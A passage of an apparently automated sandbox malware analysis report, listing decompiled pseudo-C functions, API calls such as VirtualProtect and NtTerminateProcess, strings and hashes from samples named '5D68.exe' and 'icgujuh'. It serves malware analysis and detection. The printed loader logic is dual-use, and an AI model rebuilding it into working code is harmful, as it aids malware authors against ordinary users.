Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36c7c2ea362ab175c8faec48889e7f9c448137358fc225cecc8bd01fb5f49981
Instruction ID: 0d435e3da4236d765e4c301cf304dd2dd2fe2570b998ddab2789a7de4284b15f
Opcode Fuzzy Hash: 36c7c2ea362ab175c8faec48889e7f9c448137358fc225cecc8bd01fb5f49981
Instruction Fuzzy Hash: 1001A27800265CAB972DCAA5D5D9041FFA9EE06330FA8EC8DC7824FD42CEB57086C643

Uniqueness

Uniqueness Score: -1.00%

Function 0040201A, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.328494203.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cz2ZyeL2Zd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50abe3c5d8af24f71ceee97d10064826831867a7979f46442cde13a65a6779ae
Instruction ID: 7ec0170f8d63d1cb41ea52610257a3a2e440b84d0ce0a50aa0c143b35ceb2a17
Opcode Fuzzy Hash: 50abe3c5d8af24f71ceee97d10064826831867a7979f46442cde13a65a6779ae
Instruction Fuzzy Hash: 26F0C87410020D6ED22CD7A0D185052B7A4FFC1304F611D5DC3422BCA2C939B853DA83

Uniqueness

Uniqueness Score: -1.00%

Function 0040201E, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.328494203.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cz2ZyeL2Zd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 348556ee60875952d1b353ddc5f2ef97f6264277c173934fb5a6c0ffb2736ff7
Instruction ID: a43892d0f1fc751e2312f163d4b39de440685b5976e97a52a0fb587587c89ddc
Opcode Fuzzy Hash: 348556ee60875952d1b353ddc5f2ef97f6264277c173934fb5a6c0ffb2736ff7
Instruction Fuzzy Hash: 32F0AF7400424D6E93299B719585092BBA4FF82304F611D8EC3825BC62CA3AB893CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0040202D, Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.328494203.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cz2ZyeL2Zd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91acaab0455c819429546f4fe30140ad69fd9360310cbf4e3092104b92557cb0
Instruction ID: d517fed31536b1fc2a21567abd7de147b63b6840b6cf7dc9692091a0263e9a5e
Opcode Fuzzy Hash: 91acaab0455c819429546f4fe30140ad69fd9360310cbf4e3092104b92557cb0
Instruction Fuzzy Hash: D4F0C27410421DAE926CDBA0D185092BBA4FFD2304F615D5DC3426BCA2CA3AF853DA82

Uniqueness

Uniqueness Score: -1.00%

Function 00402084, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.328494203.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_cz2ZyeL2Zd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2fd54db6ca68966c6ea549734bc74dc57af9ffe16b4078303ef16f8b7efa8fb
Instruction ID: b234b1e164d4dd428b17fdfb9b1103a254be6e4ce54d4f1e89fdf23064b212e5
Opcode Fuzzy Hash: b2fd54db6ca68966c6ea549734bc74dc57af9ffe16b4078303ef16f8b7efa8fb
Instruction Fuzzy Hash: 15E0C26910150E6E865C8A7195440D2B7D6FFC2240BA12D49C3062BC22893AB883D591

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: icgujuh PID: 5608 Parent PID: 7124 icgujuhCOMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	24
Total number of Limit Nodes:	0

Executed Functions

Function 0040196D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E0040196D(void* __eax, void* __ebx, void* __ecx, void* __edi, short __esi, void* __fp0) {
				intOrPtr _t14;
				void* _t17;
				intOrPtr* _t23;
				void* _t26;
				void* _t27;
				void* _t28;
				signed int _t33;
				intOrPtr* _t35;
				void* _t38;

				_t31 = __esi;
				_t29 = __edi;
				asm("in eax, 0xe5");
				 *((short*)(__eax + _t33 * 2)) = __esi;
				 *((intOrPtr*)(__eax + _t33 * 2)) = __esi;
				_push(0x1999);
				_t14 =  *_t35;
				__eflags = __al;
				_t26 = 0x5c;
				E004012AB(_t14, __ebx, _t26, _t28, __edi, __esi, _t38);
				_t23 =  *((intOrPtr*)(_t33 + 8));
				Sleep(0x1388);
				_t17 = E004014EA(_t28, _t38, __fp0, _t23,  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)), _t33 - 4); // executed
				_t39 = _t17;
				if(_t17 != 0) {
					_push( *((intOrPtr*)(_t33 + 0x14)));
					_push( *((intOrPtr*)(_t33 - 4)));
					_push(_t17);
					_push(_t23); // executed
					E004015BD(_t23, _t28, _t29, _t31, _t39); // executed
				}
				 *_t23(0xffffffff, 0); // executed
				_t27 = 0x5c;
				return E004012AB(0x1999, _t23, _t27, _t28, _t29, _t31, _t39);
			}

APIs

Sleep.KERNELBASE(00001388), ref: 004019A1
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Strings

j\Y, xrefs: 00401989

Memory Dump Source

Source File: 00000012.00000002.377751226.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_icgujuh.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID: j\Y
API String ID: 417527130-662177190
Opcode ID: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
Instruction ID: 595b9c3ea7707adfb89ee20c44a57f79679102a22a402f6ef59d3c67027402ce
Opcode Fuzzy Hash: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
Instruction Fuzzy Hash: B10184B2604245EBDB005FE5DC92DAA3B74AF01314F2401ABF512B91F2DA3C8513E71A

Uniqueness

Uniqueness Score: -1.00%

Function 00401962, Relevance: 3.1, APIs: 2, Instructions: 52
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00401962(void* __ecx, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				void* _t12;
				void* _t17;
				intOrPtr* _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;

				_push(0x1999);
				_t9 =  *_t25;
				__eflags = __al;
				_t20 = 0x5c;
				E004012AB(_t9, _t17, _t20, _t22, _t23, _t24, _t27);
				_t18 = _a4;
				Sleep(0x1388);
				_t12 = E004014EA(_t22, _t27, __fp0, _t18, _a8, _a12,  &_v8); // executed
				_t28 = _t12;
				if(_t12 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t12);
					_push(_t18); // executed
					E004015BD(_t18, _t22, _t23, _t24, _t28); // executed
				}
				 *_t18(0xffffffff, 0); // executed
				_t21 = 0x5c;
				return E004012AB(0x1999, _t18, _t21, _t22, _t23, _t24, _t28);
			}

APIs

Sleep.KERNELBASE(00001388), ref: 004019A1
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Memory Dump Source

Source File: 00000012.00000002.377751226.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_icgujuh.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
Instruction ID: c7dbb5b86db80192b1cd6b67b95130a9e8bba6362884e51d04f8a5ef40e6dacf
Opcode Fuzzy Hash: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
Instruction Fuzzy Hash: A50144F1208205FBEB005AD59DA2E7B3668AB01715F20013BBA03790F1D57D9913E72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0B, Relevance: 1.6, APIs: 1, Instructions: 96
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Memory Dump Source

Source File: 00000012.00000002.377751226.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_icgujuh.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
Instruction ID: 6d9108f025a0daaf84588f91761baf46a4613dd7645499535b00fdf5ce75212c
Opcode Fuzzy Hash: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
Instruction Fuzzy Hash: 3E21D074609204EAC7156665C863FB637909B41329F60153FE9A3BE2F2C67C4487EB27

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: 5D68.exe PID: 1764 Parent PID: 3352 5D68.exeCOMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	29.5%
Signature Coverage:	6.8%
Total number of Nodes:	88
Total number of Limit Nodes:	5

Executed Functions

Function 0041CB7B, Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 412
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vswprintf_c_l.LIBCMTD ref: 0041CBA1

Part of subcall function 00421260: __vswprintf_helper.LIBCMTD ref: 00421281

_puts.LIBCMTD ref: 0041CBA7

Part of subcall function 004231F0: __invalid_parameter.LIBCMTD ref: 0042327D

__wrename.LIBCMTD ref: 0041CBAE

Part of subcall function 004231A0: __dosmaperr.LIBCMTD ref: 004231D4

Part of subcall function 0041EE71: __EH_prolog.LIBCMT ref: 0041EE76

Part of subcall function 00422BF0: _doexit.LIBCMTD ref: 00422BFD

Strings

\H, xrefs: 0041CE6C
E6B, xrefs: 0041CFA7, 0041D086, 0041CFAB, 0041D08A

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: H_prolog__dosmaperr__invalid_parameter__vswprintf_c_l__vswprintf_helper__wrename_doexit_puts
String ID: E6B$\H
API String ID: 1318488268-840798999
Opcode ID: 06f537d1d45ab80b7a9019ecb8eaff30d1d6772636f9effbf4ecb464780c79a9
Instruction ID: 3af5b127253545b488e8dcfed504778f69243de408ec4bc808c5fca7c689a554
Opcode Fuzzy Hash: 06f537d1d45ab80b7a9019ecb8eaff30d1d6772636f9effbf4ecb464780c79a9
Instruction Fuzzy Hash: B6D15332442665BFD325ABA1ED4DEDF3E6CEF4A351B004436F24AA1470C7384685CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040174C, Relevance: 3.3, APIs: 2, Instructions: 300
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.398062722.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_5D68.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ce1f821b1add3b19d25f5d05520d9875b10e16c09cb4ec3d7ac6c82c097d3ad
Instruction ID: 0d46a682724786e6ce09401c6bb99755c0c3e92dae499ab07bdf75d22f78f697
Opcode Fuzzy Hash: 8ce1f821b1add3b19d25f5d05520d9875b10e16c09cb4ec3d7ac6c82c097d3ad
Instruction Fuzzy Hash: AB81B93720A2409FD7059F64ACC69D6BF60FE4277477405BBE8519F192C23B9046CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040193B, Relevance: 3.0, APIs: 2, Instructions: 50
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E0040193B(void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				void* _t13;
				void* _t15;
				intOrPtr* _t16;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;

				_t23 = __eflags;
				_push(0x60);
				E00401277(0x196d, _t15, _t20, _t21, _t22, __eflags);
				_t16 = _a4;
				Sleep(0x1388);
				_t3 =  &_v8; // 0x6d74c454
				_t11 = E004014C6(_t19, _t23, _t16, _a8, _a12, _t3); // executed
				_t24 = _t11;
				if(_t11 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t11);
					_push(_t16); // executed
					E0040158E(_t16, _t20, _t21); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_t13 = 0x196d;
				return E00401277(_t13, _t16, _t20, _t21, _t22, _t24);
			}

0x0040193b
0x0040195e
0x00401968
0x0040196d
0x00401975
0x00401978
0x00401983
0x00401988
0x0040198a
0x0040198c
0x0040198f
0x00401992
0x00401993
0x00401994
0x00401994
0x0040199d
0x004019ac
0x004019d1

APIs

Sleep.KERNELBASE(00001388), ref: 00401975
NtTerminateProcess.NTDLL(000000FF,00000000), ref: 0040199D

Memory Dump Source

Source File: 00000016.00000002.398062722.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_5D68.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 1a9978d9b5f9b771fc7abb4f7335fdbd77f3de47f634a686ed35e0b73c86497d
Instruction ID: 0afda5ea5482ca317b239c5736bf45b38e37598d1d24d957277b29e3f1ce3eae
Opcode Fuzzy Hash: 1a9978d9b5f9b771fc7abb4f7335fdbd77f3de47f634a686ed35e0b73c86497d
Instruction Fuzzy Hash: EA01ADF2208209F6DF006AA18DA2EBA36289B01354F200237B613B80F1C57D8912E77F

Uniqueness

Uniqueness Score: -1.00%

Function 00401947, Relevance: 3.0, APIs: 2, Instructions: 44
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E00401947(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t11;
				void* _t13;
				intOrPtr* _t16;
				void* _t21;
				void* _t26;

				_t29 = __eflags;
				_t24 = __esi;
				_t22 = __edi;
				asm("outsd");
				_push(0x60);
				E00401277(0x196d, __ebx, __edi, __esi, _t26, __eflags);
				_t16 =  *((intOrPtr*)(_t26 + 8));
				Sleep(0x1388);
				_t3 = _t26 - 4; // 0x6d74c454
				_t11 = E004014C6(_t21, _t29, _t16,  *((intOrPtr*)(_t26 + 0xc)),  *((intOrPtr*)(_t26 + 0x10)), _t3); // executed
				_t30 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t26 + 0x14)));
					_push( *((intOrPtr*)(_t26 - 4)));
					_push(_t11);
					_push(_t16); // executed
					E0040158E(_t16, _t22, _t24); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_t13 = 0x196d;
				return E00401277(_t13, _t16, _t22, _t24, _t26, _t30);
			}

0x00401947
0x00401947
0x00401947
0x00401949
0x0040195e
0x00401968
0x0040196d
0x00401975
0x00401978
0x00401983
0x00401988
0x0040198a
0x0040198c
0x0040198f
0x00401992
0x00401993
0x00401994
0x00401994
0x0040199d
0x004019ac
0x004019d1

APIs

Sleep.KERNELBASE(00001388), ref: 00401975
NtTerminateProcess.NTDLL(000000FF,00000000), ref: 0040199D

Memory Dump Source

Source File: 00000016.00000002.398062722.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_5D68.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 16a14a9a36b8fb2956a1118e0d7637d04b961880047010fc3d342311686654ee
Instruction ID: f5571db122147025026cbd90472d120537b67d68ca61a26d356da5241f38e411
Opcode Fuzzy Hash: 16a14a9a36b8fb2956a1118e0d7637d04b961880047010fc3d342311686654ee
Instruction Fuzzy Hash: C8F04FB2304249F6DF006AE59EA1EBA36559B05314F304637B613B80F1C63D8912E72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401951, Relevance: 3.0, APIs: 2, Instructions: 44
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00401951(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t11;
				void* _t13;
				intOrPtr* _t16;
				void* _t25;

				_t28 = __eflags;
				_t23 = __esi;
				_t21 = __edi;
				_push(0x60);
				E00401277(0x196d, __ebx, __edi, __esi, _t25, __eflags);
				_t16 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_t3 = _t25 - 4; // 0x6d74c454
				_t11 = E004014C6(0xc5, _t28, _t16,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t3); // executed
				_t29 = _t11;
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t11);
					_push(_t16); // executed
					E0040158E(_t16, _t21, _t23); // executed
				}
				 *_t16(0xffffffff, 0); // executed
				_t13 = 0x196d;
				return E00401277(_t13, _t16, _t21, _t23, _t25, _t29);
			}

0x00401951
0x00401951
0x00401951
0x0040195e
0x00401968
0x0040196d
0x00401975
0x00401978
0x00401983
0x00401988
0x0040198a
0x0040198c
0x0040198f
0x00401992
0x00401993
0x00401994
0x00401994
0x0040199d
0x004019ac
0x004019d1

APIs

Sleep.KERNELBASE(00001388), ref: 00401975
NtTerminateProcess.NTDLL(000000FF,00000000), ref: 0040199D

Memory Dump Source

Source File: 00000016.00000002.398062722.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_5D68.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 59a9e369fe74b50a35279fc1ab413491a692258faa6e0d31dd86055c0e4398fa
Instruction ID: 3f613a8e0615f1e78f1be87f7705c95df704b5c8d3b73afb4f46b7ce5dc05311
Opcode Fuzzy Hash: 59a9e369fe74b50a35279fc1ab413491a692258faa6e0d31dd86055c0e4398fa
Instruction Fuzzy Hash: 12F044B2304249F7DF005A919DA1EBA36659B05714F200537B613B80F1C57D8512F72F

Uniqueness

Uniqueness Score: -1.00%

Function 0041ACF0, Relevance: 62.0, APIs: 1, Strings: 34, Instructions: 794
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00000040,00000000), ref: 0041C921

Strings

R$#, xrefs: 0041B459
H/P, xrefs: 0041C252
SKCo, xrefs: 0041B019
Dx8|, xrefs: 0041B902
Ig, xrefs: 0041BF68
FW,(, xrefs: 0041B986
[qFq, xrefs: 0041B149
*9ix, xrefs: 0041B735
=:6U, xrefs: 0041B30E
PV, xrefs: 0041BCC0
Sst1, xrefs: 0041B180
*E[o, xrefs: 0041B113
y]n6, xrefs: 0041BDCC
qcc-, xrefs: 0041B46C
>e] , xrefs: 0041BEBB
w/a, xrefs: 0041B37B
JfG, xrefs: 0041AE88
VirtualProtect, xrefs: 0041B7DE, 0041B7E3, 0041C8C4
F[x`, xrefs: 0041B222
N%z", xrefs: 0041B316
[(, xrefs: 0041C097
(::L, xrefs: 0041B0F2
1s<R, xrefs: 0041B6C5
g$0, xrefs: 0041BAAC
k/^, xrefs: 0041BDC1
CWv, xrefs: 0041B923
p0SP, xrefs: 0041B1EE
/><, xrefs: 0041B3E9
9o, xrefs: 0041B9F4
T, xrefs: 0041C0AD
|~, xrefs: 0041BC94
lh;_, xrefs: 0041B8F7
kOon, xrefs: 0041B00E
IkL, xrefs: 0041B0DC

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: ProtectVirtual
String ID: w/a$g$0$PV$(::L$*9ix$*E[o$/><$1s<R$=:6U$>e] $Dx8|$FW,($F[x`$IkL$Ig$JfG$N%z"$R$#$SKCo$Sst1$T$VirtualProtect$[qFq$[($k/^$kOon$lh;_$p0SP$qcc-$y]n6$9o$CWv$H/P$|~
API String ID: 544645111-66855312
Opcode ID: b9be011763a2fb58e0054c15f96da36981cdf675d4122b25e1296a6946073bd5
Instruction ID: 28f019a1d04dc0b5418d6a354c80174508fe4464ce0478ada0238074877ed3ba
Opcode Fuzzy Hash: b9be011763a2fb58e0054c15f96da36981cdf675d4122b25e1296a6946073bd5
Instruction Fuzzy Hash: 88C2CAB450D3C08BD2B58F1A858978FFBE4BB95708F508A0CE6D95B611CB718A85CF4B

Uniqueness

Uniqueness Score: -1.00%

Function 004234E0, Relevance: 16.6, APIs: 11, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_check_managed_app.LIBCMTD ref: 0042355C
__heap_init.LIBCMTD ref: 00423566

Part of subcall function 00433C00: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,0042356B,00000001), ref: 00433C16

_fast_error_exit.LIBCMTD ref: 00423574

Part of subcall function 004236C0: ___crtExitProcess.LIBCMTD ref: 004236E4

__mtinit.LIBCMTD ref: 0042357C
_fast_error_exit.LIBCMTD ref: 00423587
__RTC_Initialize.LIBCMTD ref: 00423599
___crtGetEnvironmentStringsW.LIBCMTD ref: 004235C2
___wsetargv.LIBCMTD ref: 004235CC
__wsetenvp.LIBCMTD ref: 004235DF
__cinit.LIBCMTD ref: 004235F4
__wwincmdln.LIBCMTD ref: 00423611

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: ___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___wsetargv__cinit__heap_init__mtinit__wsetenvp__wwincmdln_check_managed_app
String ID:
API String ID: 2562088257-0
Opcode ID: 20a56575ae93d3650bf24b493235238bf6e89564cb2478d959f991eca20672fd
Instruction ID: c4296a4faba0d5eda460293f8b2d8abf8d285cedf06a52d5e7387ddaa75a0859
Opcode Fuzzy Hash: 20a56575ae93d3650bf24b493235238bf6e89564cb2478d959f991eca20672fd
Instruction Fuzzy Hash: E441C8B1E00318BAD710EFB2FD0679E76B4AB04719F50012EF40997282E77D96008B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00423555, Relevance: 16.6, APIs: 11, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_check_managed_app.LIBCMTD ref: 0042355C
__heap_init.LIBCMTD ref: 00423566

Part of subcall function 00433C00: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,0042356B,00000001), ref: 00433C16

_fast_error_exit.LIBCMTD ref: 00423574

Part of subcall function 004236C0: ___crtExitProcess.LIBCMTD ref: 004236E4

__mtinit.LIBCMTD ref: 0042357C
_fast_error_exit.LIBCMTD ref: 00423587
__RTC_Initialize.LIBCMTD ref: 00423599
___crtGetEnvironmentStringsW.LIBCMTD ref: 004235C2
___wsetargv.LIBCMTD ref: 004235CC
__wsetenvp.LIBCMTD ref: 004235DF
__cinit.LIBCMTD ref: 004235F4
__wwincmdln.LIBCMTD ref: 00423611

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: ___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___wsetargv__cinit__heap_init__mtinit__wsetenvp__wwincmdln_check_managed_app
String ID:
API String ID: 2562088257-0
Opcode ID: 13423e202e7a58267f3f55f80a8a9818587dc056c0c7ab9dbd78dc0a56904b56
Instruction ID: 58ea7016c38aa4e594a13d1bd1c6543b97cc611fb78cecc77422fae1e89442be
Opcode Fuzzy Hash: 13423e202e7a58267f3f55f80a8a9818587dc056c0c7ab9dbd78dc0a56904b56
Instruction Fuzzy Hash: 463144B1F003247AEB10AFB2B90775E7674AB1431DF50052EE90957283F6BD96418B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0058003C, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0058024D

Strings

kernel32.dll, xrefs: 0058008F, 00580095
cess, xrefs: 0058018D

Memory Dump Source

Source File: 00000016.00000002.398200005.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_580000_5D68.jbxd

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction ID: a09487cd1e149a97cacfaebf5adc74f0e72bf6d0b1eae382a6e1df17f1b635c6
Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
Instruction Fuzzy Hash: 4A526B74A01229DFDBA4DF58C985BA8BBB1BF09304F1480D9E94DA7351DB30AE89DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00424DB7, Relevance: 7.8, APIs: 5, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__CrtCheckMemory.LIBCMTD ref: 00424DDA
__heap_alloc_base.LIBCMTD ref: 00424F61
_memset.LIBCMT ref: 004250A9
_memset.LIBCMT ref: 004250C6
_memset.LIBCMT ref: 004250E1

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: _memset$CheckMemory__heap_alloc_base
String ID:
API String ID: 4254127243-0
Opcode ID: 0b23ad2e7bfe5d860bb4f2db0e704635e5cc85a032fe317be9af9f6b6d2a167d
Instruction ID: 1d6e0c5a0109c797299bb2923c89682e7408fed3591947e654932ce5f33814f8
Opcode Fuzzy Hash: 0b23ad2e7bfe5d860bb4f2db0e704635e5cc85a032fe317be9af9f6b6d2a167d
Instruction Fuzzy Hash: 28A15C74A00318DFDB14CF48E981BAA7BB0FB88315F24816AE515AB391D379ED44CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00432E60, Relevance: 6.3, APIs: 4, Instructions: 326
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__nh_malloc_dbg.LIBCMTD ref: 00432EEB
__nh_malloc_dbg.LIBCMTD ref: 00433017

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __nh_malloc_dbg
String ID:
API String ID: 2526938719-0
Opcode ID: c0f71300fb99a17aebe09299377a4987d8d27eb8d1dd4ca988500b6b7fba545f
Instruction ID: 464f32aa7de72b83fa673ebce4e88a7f25332abf2c6c53f107f7426b4b7e1274
Opcode Fuzzy Hash: c0f71300fb99a17aebe09299377a4987d8d27eb8d1dd4ca988500b6b7fba545f
Instruction Fuzzy Hash: 46E10874E04248CFDB24CFA8C894BAEFBB1BB49315F24825ED4656B392C7359942CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00424D1F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

QQ, xrefs: 00424D19

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID:
String ID: QQ
API String ID: 0-3460843698
Opcode ID: 5a4cefda0844be5663b248d3b4140914fbb989cdbf8075c6b5c2b9370d474441
Instruction ID: e068424986e6b0015de0c2819870468599843e6b294b68a55d618a14974dc8b0
Opcode Fuzzy Hash: 5a4cefda0844be5663b248d3b4140914fbb989cdbf8075c6b5c2b9370d474441
Instruction Fuzzy Hash: BE0119B5B10119EBDB14CF54F880AAB77B4EBC8304F90815AF8158B240D378EE52DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042512E, Relevance: 3.1, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__invalid_parameter.LIBCMTD ref: 0042518D
_memset.LIBCMT ref: 004251D9

Memory Dump Source

